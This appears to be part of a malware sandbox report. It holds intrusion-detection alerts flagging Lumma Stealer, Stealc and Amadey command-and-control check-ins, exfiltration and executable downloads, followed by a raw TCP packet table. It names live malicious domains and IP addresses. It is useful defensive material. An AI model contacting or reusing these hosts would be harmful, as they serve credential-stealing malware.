2024-12-19T10:14:04.571209+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50372	172.67.179.109	443	TCP
2024-12-19T10:14:04.577871+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50371	172.67.179.109	443	TCP
2024-12-19T10:14:04.577871+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50371	172.67.179.109	443	TCP
2024-12-19T10:14:11.997042+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50375	104.21.23.76	443	TCP
2024-12-19T10:14:11.997042+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50375	104.21.23.76	443	TCP
2024-12-19T10:14:12.259688+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50349	104.21.66.85	443	TCP
2024-12-19T10:14:13.870845+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50379	104.21.66.85	443	TCP
2024-12-19T10:14:13.870845+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50379	104.21.66.85	443	TCP
2024-12-19T10:14:20.351671+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50381	172.67.179.109	443	TCP
2024-12-19T10:14:20.351671+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50381	172.67.179.109	443	TCP
2024-12-19T10:14:21.379841+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50383	172.67.179.109	443	TCP
2024-12-19T10:14:21.379841+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50383	172.67.179.109	443	TCP
2024-12-19T10:14:28.135032+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50386	104.21.23.76	443	TCP
2024-12-19T10:14:28.135032+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50386	104.21.23.76	443	TCP
2024-12-19T10:14:28.820607+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50379	104.21.66.85	443	TCP
2024-12-19T10:14:30.048551+0100	2058355	ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)	1	192.168.2.6	50387	104.21.66.85	443	TCP
2024-12-19T10:14:30.048551+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50387	104.21.66.85	443	TCP
2024-12-19T10:14:36.040726+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50383	172.67.179.109	443	TCP
2024-12-19T10:14:36.163512+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50391	172.67.179.109	443	TCP
2024-12-19T10:14:36.163512+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50391	172.67.179.109	443	TCP
2024-12-19T10:14:37.266248+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50393	172.67.179.109	443	TCP
2024-12-19T10:14:37.266248+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50393	172.67.179.109	443	TCP
2024-12-19T10:14:43.258744+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50395	104.21.23.76	443	TCP
2024-12-19T10:14:43.258744+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50395	104.21.23.76	443	TCP
2024-12-19T10:14:43.261752+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50396	172.67.180.113	443	TCP
2024-12-19T10:14:43.749443+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50387	104.21.66.85	443	TCP
2024-12-19T10:14:51.859002+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50400	172.67.179.109	443	TCP
2024-12-19T10:14:51.859002+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50400	172.67.179.109	443	TCP
2024-12-19T10:14:51.949375+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50393	172.67.179.109	443	TCP
2024-12-19T10:14:53.414485+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	50401	185.215.113.16	80	TCP
2024-12-19T10:14:57.308094+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50396	172.67.180.113	443	TCP
2024-12-19T10:14:57.366688+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50395	104.21.23.76	443	TCP
2024-12-19T10:14:58.539015+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50412	172.67.180.113	443	TCP
2024-12-19T10:14:58.790504+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50413	104.21.23.76	443	TCP
2024-12-19T10:14:58.790504+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50413	104.21.23.76	443	TCP
2024-12-19T10:15:03.935747+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50416	185.215.113.206	80	TCP
2024-12-19T10:15:07.140066+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:07.140066+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:08.839521+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	50419	185.215.113.43	80	TCP
2024-12-19T10:15:13.487606+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50421	172.67.180.113	443	TCP
2024-12-19T10:15:14.212729+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50413	104.21.23.76	443	TCP
2024-12-19T10:15:15.434443+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.6	50422	104.21.23.76	443	TCP
2024-12-19T10:15:15.434443+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50422	104.21.23.76	443	TCP
2024-12-19T10:15:21.864915+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:21.864915+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50418	172.67.179.109	443	TCP
2024-12-19T10:15:21.869256+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.6	49157	1.1.1.1	53	UDP
2024-12-19T10:15:23.230861+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50427	104.21.64.80	443	TCP
2024-12-19T10:15:23.230861+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50427	104.21.64.80	443	TCP
2024-12-19T10:15:29.076004+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50430	172.67.180.113	443	TCP
2024-12-19T10:15:29.080104+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50431	104.21.64.80	443	TCP
2024-12-19T10:15:29.080104+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50431	104.21.64.80	443	TCP
2024-12-19T10:15:29.548726+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50422	104.21.23.76	443	TCP
2024-12-19T10:15:36.831185+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50427	104.21.64.80	443	TCP
2024-12-19T10:15:38.296391+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	50435	185.215.113.16	80	TCP
2024-12-19T10:15:44.147166+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50438	172.67.180.113	443	TCP
2024-12-19T10:15:44.281141+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50439	104.21.64.80	443	TCP
2024-12-19T10:15:44.281141+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50439	104.21.64.80	443	TCP
2024-12-19T10:15:48.798638+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50441	185.215.113.206	80	TCP
2024-12-19T10:15:57.647697+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50438	172.67.180.113	443	TCP
2024-12-19T10:15:57.647697+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50438	172.67.180.113	443	TCP
2024-12-19T10:15:58.868875+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50447	172.67.180.113	443	TCP
2024-12-19T10:15:58.888579+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50448	104.21.64.80	443	TCP
2024-12-19T10:15:58.888579+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50448	104.21.64.80	443	TCP
2024-12-19T10:16:13.844665+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50447	172.67.180.113	443	TCP
2024-12-19T10:16:14.095435+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50453	104.21.64.80	443	TCP
2024-12-19T10:16:14.095435+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50453	104.21.64.80	443	TCP
2024-12-19T10:16:27.580171+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50453	104.21.64.80	443	TCP
2024-12-19T10:16:28.946075+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50459	104.21.64.80	443	TCP
2024-12-19T10:16:28.946075+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50459	104.21.64.80	443	TCP
2024-12-19T10:16:43.080676+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.6	50459	104.21.64.80	443	TCP
2024-12-19T10:16:44.298005+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50466	104.21.64.80	443	TCP
2024-12-19T10:16:44.298005+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50466	104.21.64.80	443	TCP
2024-12-19T10:16:58.489466+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50466	104.21.64.80	443	TCP
2024-12-19T10:16:59.958213+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.6	50478	185.215.113.16	80	TCP
2024-12-19T10:17:10.526107+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	50486	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 10:08:52.482011080 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:52.482217073 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:52.482242107 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:52.482264996 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:52.482291937 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:52.482347012 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:52.484363079 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:52.603991985 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:52.629683018 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.629722118 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.629754066 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.629895926 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.629914999 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.629934072 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.629947901 CET	49705	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:08:52.629949093 CET	49705	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:08:52.630002022 CET	49705	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:08:52.638123035 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.638335943 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.638397932 CET	49705	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:08:52.648271084 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.648310900 CET	443	49705	20.190.181.3	192.168.2.6
Dec 19, 2024 10:08:52.648375034 CET	49705	443	192.168.2.6	20.190.181.3
Dec 19, 2024 10:08:53.028167963 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:53.029859066 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:53.029917955 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:53.030050039 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:53.150079012 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:53.150140047 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:53.150168896 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:53.572328091 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:53.617463112 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:53.764321089 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:53.775197983 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:53.894900084 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:54.070676088 CET	49673	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:08:54.070807934 CET	49674	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:08:54.317080021 CET	443	49706	20.198.119.84	192.168.2.6
Dec 19, 2024 10:08:54.367494106 CET	49706	443	192.168.2.6	20.198.119.84
Dec 19, 2024 10:08:54.383196115 CET	49672	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:09:01.449172020 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:01.449296951 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:01.449991941 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:01.450644970 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:01.450684071 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:03.680250883 CET	49674	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:09:03.686032057 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:03.690865040 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:03.696608067 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:03.696630955 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:03.697036982 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:03.699249029 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:03.699326992 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:03.699336052 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:03.699501038 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:03.747329950 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:03.820801973 CET	49673	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:09:03.992631912 CET	49672	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:09:04.241674900 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:04.242033958 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:04.242129087 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:04.242346048 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:04.242388010 CET	443	49707	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:04.242417097 CET	49707	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:06.382814884 CET	443	49702	173.222.162.64	192.168.2.6
Dec 19, 2024 10:09:06.382925034 CET	49702	443	192.168.2.6	173.222.162.64
Dec 19, 2024 10:09:13.016796112 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:13.016843081 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:13.016923904 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:13.017546892 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:13.017574072 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.234379053 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.234472990 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.237314939 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.237320900 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.237557888 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.239640951 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.239696980 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.239701986 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.239840031 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.283366919 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.902705908 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.902786970 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:15.902843952 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.903099060 CET	49724	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:15.903135061 CET	443	49724	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:33.813088894 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:33.813138008 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:33.813234091 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:33.813841105 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:33.813870907 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.040149927 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.040234089 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.128870010 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.128906965 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.129164934 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.180007935 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.210707903 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.210767984 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.210778952 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.211021900 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.251337051 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.759118080 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.759197950 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:36.759246111 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.759433031 CET	49773	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:36.759455919 CET	443	49773	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:56.253937960 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:56.254028082 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:56.254129887 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:56.254621029 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:56.254662037 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:58.500547886 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:58.500829935 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:58.502499104 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:58.502562046 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:58.502818108 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:58.504741907 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:58.504743099 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:58.504854918 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:58.504888058 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:58.547333002 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:59.056035042 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:59.056648016 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:59.056648016 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:09:59.056716919 CET	443	49828	20.198.118.190	192.168.2.6
Dec 19, 2024 10:09:59.056797028 CET	49828	443	192.168.2.6	20.198.118.190
Dec 19, 2024 10:10:04.585098028 CET	49846	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:04.705482006 CET	80	49846	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:04.705578089 CET	49846	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:04.708255053 CET	49846	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:04.828212023 CET	80	49846	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:06.054050922 CET	80	49846	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:06.054313898 CET	49846	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:07.571471930 CET	49846	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:07.571867943 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:07.691720009 CET	80	49856	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:07.691773891 CET	80	49846	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:07.691942930 CET	49846	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:07.692070961 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:07.692070961 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:07.812100887 CET	80	49856	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:09.057771921 CET	80	49856	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:09.057842970 CET	80	49856	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:09.057960033 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:09.057960033 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:09.292747021 CET	80	49856	185.215.113.43	192.168.2.6
Dec 19, 2024 10:10:09.292933941 CET	49856	80	192.168.2.6	185.215.113.43
Dec 19, 2024 10:10:09.297471046 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:09.417541027 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:09.417623997 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:09.417787075 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:09.537448883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760162115 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760237932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760276079 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760302067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760312080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760339022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760349035 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760365009 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760392904 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760405064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760442019 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760449886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760478973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760485888 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760515928 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760520935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760554075 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.760555983 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.760596037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.880882025 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.880903959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.880939007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.880959034 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.952462912 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.952519894 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.952682972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.956372023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.956465960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.956525087 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.965594053 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.965648890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.965709925 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.974117041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.974277020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.974339008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.981961966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.982011080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.982111931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.990663052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.990691900 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.990741968 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:10.998375893 CET	80	49860	185.215.113.16	192.168.2.6
